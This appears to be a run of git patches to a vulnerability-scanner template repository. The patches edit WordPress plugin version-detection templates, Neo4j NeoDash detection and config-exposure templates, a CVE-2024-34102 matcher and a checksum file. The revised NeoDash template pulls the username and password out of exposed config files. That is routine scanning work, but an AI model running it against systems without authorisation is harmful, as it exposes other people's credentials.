"{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a5371ce258195fbcd8571faa7a0e7bb8fbfc9290bb39a9ef38247ae007032d10221008acaaa8ef199ab0c4bc01d5750faac09fbb789b5ce7adaa694a266405ad554c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index fe97ec0b48..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3f58191318a9abc2cd62c4be7f914bf5a26d4d08a3f0beae18e22b39059a47402210093573456f8b47ca880782c83d6f808c56eda2dd7cdd5d309e99b0c638aa3fd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 3f5159f2f6..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200495099340436207c8caff4fa454e72ff726040eda93641f5f504d5ab4ab91a902203f4f5213295386f341fe8b6b3daf563c0c4503760916a126f307cba1f2aef603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 9525568f07..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e0501d0e3c1238ee02e75b13d56f906228c0619fe150716b6ef1852b436ffb602203a8ee6b1ac44ebfad6972cb76912e4ca389eb94c27ac95c0bb466df299f713ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index fd6867a882..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022052134a8a85843cc87799bbd5e9246ce5a9c17e2d4bd1dccf4b0ceef27bd1693b022100934f6ad05d8afe3075f04c1ff899a947d02beee4b3c4acb4cac90f82fb8e66ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 53df65b711..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034c61560f9f37c353cca55ff5e459f7e760168d42f93007277256492730dc0ad02201a766a6aad16f5f1fcba8f3ac67fc78128b90fa8817c6fc4f245a8e46fd04c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01e0363feb..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ceb06c494c6ccb9bc5470b7da4bfce4768374a6b8ce6730b7e8822259cb9887402204ebf6ac97fdffa5a9bad6eb219c42b8b409b8531657ed65dcf5cef3b683385b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index d6a69a409d..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201db331b43ab947ede1b4e42ddcbf1ba461adbc114f0de47c1ac07725fc2bbfe8022100b5f008630b116a8730c85a4c8462892e3add75d9580717e066a878b501736010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index ab94b86dce..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b14cf2a0b3591d18837b14abbad6e9df7c9cb74e95f3198e66ef098a5463d03d02206c21a25397575144406dfa322bd512f07db49837706b83f0d26d8e1bbb32adb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 742b27655b..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009ee6d5f8a4b34485317a7478dc1b68ae36892697dfe7526e78cb20afd0a9db620220629dd1e641bbfce8bcc255f5b40ada08a0f7b968e22f7ed2eee847cdf5b82fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 7d625110d5..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-reviews-plugin-for-google/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085a793d54edbd93dabc1cc989134d164b63cee8e4e114ea797c03b3c6efeb7ba022100ec836a771abf3861518526486d28521227e6bc83e542858f846db08fa12dad37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index fd2eb1a500..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-rollback/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be2af5dc88451aa7f61d43dbdf6c50b477a1d5e64bb563aed46fbe0a475917d5022100d8cdd1b17948a35c6d5633933da4d916380b4a502b7f794fc8a218dd4b439879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2f11170db5..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-seopress/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220080d1207fdd1d748393f45b6a85ba0b875e1ce0d643ff167cd687c324011a92d022012912b29e613fec0046187a22fd92a5c82a3545b56e3d7d605b1efb71434975a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index aa147cccce..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e544438791fe565b2d7a40ee1d130c31149f0ef732b259eef889b5a029e8f57702202c1dffe79ca89b31ce3ce690664295e33175340dbb86ffddd99aff67c0f83106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 3dff16d960..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205573415c5fb11b6ead6e5f5d7d48b3de102351e31135620c6d698eb2286b9865022062ac0cb76a1ae683796cd2d42709c9af38e8521796280bea8dc8c5ebad96e337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5c1963916a..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb810f29d19a507c646fd83bb8779c915f344e4349abe1f2f2e4581f9bb489d7022049cd5954550083b7dfaba641c54ab4d5fa5e06665aec4826ebbed18a04b333b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index f4b8a278bf..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb65403ec39cb1fb99bb11f62c8d307d113fbdbe9bac9a48c54fc1047d5b0a6c02201d8714c10695f7caf35636fcf0eae4fc587b9d98217a5aa9f29dd5bc05803e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 93942a58e9..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087843131111cb82d917abc587559105e9198058dbe90d0428842e9212357468c022100c0b062e8b98af079c22abbf4220d747df985c2eaa935e0cef98626ae6f61407d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 89dfb05677..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064d83b0c7b444554bc0b1f4c2d39429d199a30a6d998d8d99f7546640b995d5802204622ee11f10b4ee5ec97f4efc056b03f18888c39db49d170753ddf9d2397585d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 8957665fd4..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017d2de675d86c291260797b01931f229e4a835759d7c39b55bc2a4850740c5cb022100f53d0e85f4b22283a293de3ca4209d2e1f4d24a34dcb9bc9ffb028f6ff9b7c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index e68721040b..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017fac232a6ef05c4c948816ca04bced34f2a66dceb86faf2c6ea8e84d7134b78022048500d0ea663a92fa38a63e719f53c6379f573d4efc4a5f5408269a764e0816b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 715c104555..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpvivid-backuprestore/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ea73b145020e573adf0b4f2c7b7435b9391ada2c5ef91e719ddaf5207fbd0f2022100b148bfca14e8ebbe4f16856e54072fd68d473870000dcc39ca4f7093beb629bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index da139ad588..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220224be3502d1653c391ea9f247e7a77c9e9ec64034e4f18d8723dff9cae8c4e840220303d97f0ebff5a925d76d9d584578816bb445d9705030766d2f05985050cf15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 968acaac2889dee45ae087726f86b29c2f35262a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 26 Jun 2024 13:44:53 +0530 Subject: [PATCH 0633/1841] updated matcher, extractor & info --- .../configs/neo4j-neodash-configexposed.yaml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/http/exposures/configs/neo4j-neodash-configexposed.yaml b/http/exposures/configs/neo4j-neodash-configexposed.yaml index f2cafd6d7d..0d95152690 100644 --- a/http/exposures/configs/neo4j-neodash-configexposed.yaml +++ b/http/exposures/configs/neo4j-neodash-configexposed.yaml @@ -1,7 +1,7 @@ -id: neo4j-neodash-configexposed +id: neo4j-neodash-config info: - name: Neo4j Neodash Detection + name: Neo4j Neodash Config - Exposure author: icarot severity: medium description: | @@ -10,9 +10,11 @@ info: cpe: cpe:2.3:a:neo4j:*:*:*:*:*:*:*:*:* metadata: max-request: 1 + verified: true vendor: neo4j product: neodash - tags: config,exposure,credential,neodash,neo4j + shodan-query: title:"NeoDash" + tags: config,exposure,neodash,neo4j http: - method: GET @@ -22,18 +24,25 @@ http: matchers-condition: and matchers: - type: word + part: body words: - 'standaloneHost' - 'standalonePort' - 'standaloneDatabase' condition: and + - type: word + part: header + words: + - 'application/json' + - type: status status: - 200 + extractors: - type: json - name: config.json + name: config part: body json: - - '.standaloneHost,.standalonePort,.standaloneDatabase,.standaloneUsername,.standalonePassword,.standaloneDashboardName' + - '.standaloneDatabase,.standaloneUsername,.standalonePassword' From fe7637a45a367e5e28503cdef2d058cbc15a748f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 26 Jun 2024 13:45:19 +0530 Subject: [PATCH 0634/1841] Rename neo4j-neodash-configexposed.yaml to neo4j-neodash-config.yaml --- ...neo4j-neodash-configexposed.yaml => neo4j-neodash-config.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/exposures/configs/{neo4j-neodash-configexposed.yaml => neo4j-neodash-config.yaml} (100%) diff --git a/http/exposures/configs/neo4j-neodash-configexposed.yaml b/http/exposures/configs/neo4j-neodash-config.yaml similarity index 100% rename from http/exposures/configs/neo4j-neodash-configexposed.yaml rename to http/exposures/configs/neo4j-neodash-config.yaml From 1e3c46f09c089c8be514ed0d98f7c16e80b1aef0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 26 Jun 2024 14:03:05 +0530 Subject: [PATCH 0635/1841] updated matcher & info --- http/technologies/neo4j-neodash-detect.yaml | 19 ++++++++----------- 1 file changed, 8 insertions(+), 11 deletions(-) diff --git a/http/technologies/neo4j-neodash-detect.yaml b/http/technologies/neo4j-neodash-detect.yaml index e65cb10513..7b461b5091 100644 --- a/http/technologies/neo4j-neodash-detect.yaml +++ b/http/technologies/neo4j-neodash-detect.yaml @@ -1,7 +1,7 @@ id: neo4j-neodash-detect info: - name: Neo4j Neodash Detection + name: Neo4j Neodash - Detect author: icarot severity: info description: | @@ -10,23 +10,20 @@ info: cpe: cpe:2.3:a:neo4j:*:*:*:*:*:*:*:*:* metadata: max-request: 1 + verified: true vendor: neo4j product: neodash + shodan-query: title:"NeoDash" tags: tech,neodash,neo4j,detect http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - matchers-condition: and matchers: - - type: word - words: - - 'NeoDash - Neo4j Dashboard Builder' - - 'Neo4j Dashboard Builder' + - type: dsl + dsl: + - 'contains(body, "NeoDash - Neo4j Dashboard Builder")' + - 'status_code == 200' condition: and - - - type: status - status: - - 200 From 5a4588464fe924291e8053b5fc94a461ed0c2f7e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 26 Jun 2024 14:27:08 +0530 Subject: [PATCH 0636/1841] minor update --- http/cves/2024/CVE-2024-34102.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index 42c338e4a0..debe60ad35 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -28,12 +28,12 @@ http: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - - "dns" + - 'dns' - type: word part: body words: - - "message" + - '"message":' - type: word part: header From 162d73a4f25ba279f6b68a494ff4ed4fb1ff4868 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 26 Jun 2024 09:01:01 +0000 Subject: [PATCH 0637/1841] Auto Generated New Template Addition List [Wed Jun 26 09:01:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..96428f5358 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/cves/2024/CVE-2024-34102.yaml From 76992231dbb20b249ac6a6118ea2ded312048e74 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 26 Jun 2024 09:01:11 +0000 Subject: [PATCH 0638/1841] Auto Generated Templates Checksum [Wed Jun 26 09:01:11 UTC 2024] :robot: --- templates-checksum.txt | 425 +++++++++++++++++++++-------------------- 1 file changed, 213 insertions(+), 212 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7a6f563ea0..818cc2e151 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -757,7 +757,7 @@ helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09 helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:83883f9a9f04a04af0c790df93d414e14826cfb7 helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 helpers/wordpress/plugins/cmb2.txt:6f2af731f80db655385d3795034b4b4bdd02a8bf -helpers/wordpress/plugins/coblocks.txt:1889abba77b26fc1827431e5d46978a5e89769e6 +helpers/wordpress/plugins/coblocks.txt:0f766def7495524760bb6627fe20754b1b42201b helpers/wordpress/plugins/code-snippets.txt:bcfacf8cd6cd2afbf752b95fba64c2c67f0c2e7b helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c @@ -801,11 +801,11 @@ helpers/wordpress/plugins/ga-google-analytics.txt:685772c638221af0e5cd971e0621df helpers/wordpress/plugins/gdpr-cookie-compliance.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d15d8cf9698c2bb6137881fc9 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:ba46cbfd15f3e265cd93b9b01e7e97a6fbfa3a14 -helpers/wordpress/plugins/google-listings-and-ads.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 +helpers/wordpress/plugins/google-listings-and-ads.txt:ce69193a5f086b7c0e6f20efbf6aee50c63e8244 helpers/wordpress/plugins/google-site-kit.txt:b112d64c12ea14bbfa5671fe7ac7af8d575b1e0b helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 -helpers/wordpress/plugins/gutenberg.txt:b6e10b645f3ab7a7a9d011ad1601bf695ace86af +helpers/wordpress/plugins/gutenberg.txt:46b9aa433f3d21deebfa357ca15abf4190ceea0e helpers/wordpress/plugins/happy-elementor-addons.txt:8365908e3026803300d1009572fe7bf474d0927b helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d @@ -835,7 +835,7 @@ helpers/wordpress/plugins/loginizer.txt:cd50e5150f44bd97a823ab2dd4155dd014f5f646 helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 -helpers/wordpress/plugins/mailpoet.txt:ad3aa02dac0a1de91cab5427e583e6630dbfef45 +helpers/wordpress/plugins/mailpoet.txt:fd472fd4593f0ae02f0d647f5e9dd1d4684d4536 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:6746a82081d852d58b152584407d5b80d3ac43f3 helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c @@ -862,7 +862,7 @@ helpers/wordpress/plugins/pixelyoursite.txt:7484f12819849725f45fc1539fd2128bde38 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d -helpers/wordpress/plugins/post-smtp.txt:71912467feb2c9dd9cf4980fe27207c145471f4c +helpers/wordpress/plugins/post-smtp.txt:70063a963fc1c0d2b47b3999fb871391747f74b9 helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d helpers/wordpress/plugins/premium-addons-for-elementor.txt:e84ad28997bf6ae8ece163b8b89ecd5f073ccae6 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 @@ -874,7 +874,7 @@ helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d179 helpers/wordpress/plugins/royal-elementor-addons.txt:a56cd29155af22769bebe0b88ece9fc6cfca3731 helpers/wordpress/plugins/safe-svg.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb helpers/wordpress/plugins/seo-by-rank-math.txt:c98fdfe8d33e88802886bd84d87d6117bcb8ad03 -helpers/wordpress/plugins/sg-cachepress.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2 +helpers/wordpress/plugins/sg-cachepress.txt:04035664301b06859586cb750fd8f8ad988856ea helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 @@ -906,7 +906,7 @@ helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/w3-total-cache.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 -helpers/wordpress/plugins/webp-converter-for-media.txt:5769e56370d18865a0fe37bcd84f60e61f7026d7 +helpers/wordpress/plugins/webp-converter-for-media.txt:404069cef132c1712e21fc32e891e96cf01bca92 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:2f748680a25a036bf7bc9ea657a46c211c9151dc @@ -915,7 +915,7 @@ helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930c helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:356ef5627363fd1b4d41745a26ed9916eeb9fe9b +helpers/wordpress/plugins/woocommerce-payments.txt:373a109947826f162ef5dba14dc054105c72c5ca helpers/wordpress/plugins/woocommerce-paypal-payments.txt:0aaa3cea7451675ff270540e13308210d8fce9ab 